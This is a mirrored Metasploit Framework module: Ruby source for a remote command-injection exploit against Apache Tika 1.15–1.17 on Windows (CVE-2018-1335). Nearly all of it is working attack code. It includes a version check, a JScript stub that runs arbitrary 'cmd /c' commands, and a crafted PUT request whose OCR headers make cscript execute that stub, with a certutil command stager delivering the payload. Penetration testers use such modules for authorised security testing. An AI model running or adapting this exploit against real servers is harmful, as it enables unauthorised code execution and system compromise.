Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/apache_tika_jp2_jscript.rb
19568 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::CmdStager

10
  include Msf::Exploit::Remote::HttpClient

11
  include Msf::Exploit::Powershell

12
  prepend Msf::Exploit::Remote::AutoCheck

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'Apache Tika Header Command Injection',

19
        'Description' => %q{

20
          This module exploits a command injection vulnerability in Apache

21
          Tika 1.15 - 1.17 on Windows.  A file with the image/jp2 content-type is

22
          used to bypass magic bytes checking.  When OCR is specified in the

23
          request, parameters can be passed to change the parameters passed

24
          at command line to allow for arbitrary JScript to execute. A

25
          JScript stub is passed to execute arbitrary code. This module was

26
          verified against version 1.15 - 1.17 on Windows 2012.

27
          While the CVE and finding show more versions vulnerable, during

28
          testing it was determined only > 1.14 was exploitable due to

29
          jp2 support being added.

30
        },

31
        'License' => MSF_LICENSE,

32
        'Privileged' => false,

33
        'Platform' => 'win',

34
        'Targets' => [

35
          [

36
            'Windows',

37
            {

38
              'Arch' => [ARCH_X86, ARCH_X64],

39
              'Platform' => 'win',

40
              'CmdStagerFlavor' => ['certutil']

41
            }

42
          ]

43
        ],

44
        'DefaultTarget' => 0,

45
        'DisclosureDate' => '2018-04-25',

46
        'Author' => [

47
          'h00die', # msf module

48
          'David Yesland', # edb submission

49
          'Tim Allison' # discovery

50
        ],

51
        'References' => [

52
          ['EDB', '46540'],

53
          ['URL', 'https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/'],

54
          ['URL', 'https://lists.apache.org/thread.html/b3ed4432380af767effd4c6f27665cc7b2686acccbefeb9f55851dca@%3Cdev.tika.apache.org%3E'],

55
          ['CVE', '2018-1335']

56
        ],

57
        'Notes' => {

58
          'Reliability' => UNKNOWN_RELIABILITY,

59
          'Stability' => UNKNOWN_STABILITY,

60
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

61
        }

62
      )

63
    )

64


65
    register_options(

66
      [

67
        Opt::RPORT(9998),

68
        OptString.new('TARGETURI', [true, 'The base path to the web application', '/'])

69
      ]

70
    )

71
  end

72


73
  def check

74
    res = send_request_cgi({

75
      'uri' => normalize_uri(target_uri),

76
    })

77
    if res.nil?

78
      vprint_error('No server response, check configuration')

79
      return CheckCode::Safe

80
    elsif res.code != 200

81
      vprint_error('No server response, check configuration')

82
      return CheckCode::Safe

83
    end

84


85
    if res.body =~ /Apache Tika (\d.[\d]+)/

86
      version = Rex::Version.new($1)

87
      vprint_status("Apache Tika Version Detected: #{version}")

88
      if version.between?(Rex::Version.new('1.15'), Rex::Version.new('1.17'))

89
        return CheckCode::Vulnerable

90
      end

91
    end

92
    CheckCode::Safe

93
  end

94


95
  def execute_command(cmd, opts = {})

96
    cmd.gsub(/"/, '\"')

97
    jscript = "var oShell = WScript.CreateObject('WScript.Shell');\n"

98
    jscript << "var oExec = oShell.Exec(\"cmd /c #{cmd}\");"

99


100
    print_status("Sending PUT request to #{peer}#{normalize_uri(target_uri, 'meta')}")

101
    res = send_request_cgi({

102
      'method' => 'PUT',

103
      'uri' => normalize_uri(target_uri, 'meta'),

104
      'headers' => {

105
        "X-Tika-OCRTesseractPath" => '"cscript"',

106
        "X-Tika-OCRLanguage" => "//E:Jscript",

107
        "Expect" => "100-continue",

108
        "Content-type" => "image/jp2",

109
        "Connection" => "close"

110
      },

111
      'data' => jscript

112
    })

113


114
    fail_with(Failure::Disconnected, 'No server response') unless res

115
    unless (res.code == 200 && res.body.include?('tika'))

116
      fail_with(Failure::UnexpectedReply, 'Invalid response received, target may not be vulnerable')

117
    end

118
  end

119


120
  def exploit

121
    execute_cmdstager(linemax: 8000)

122
  end

123
end

124


125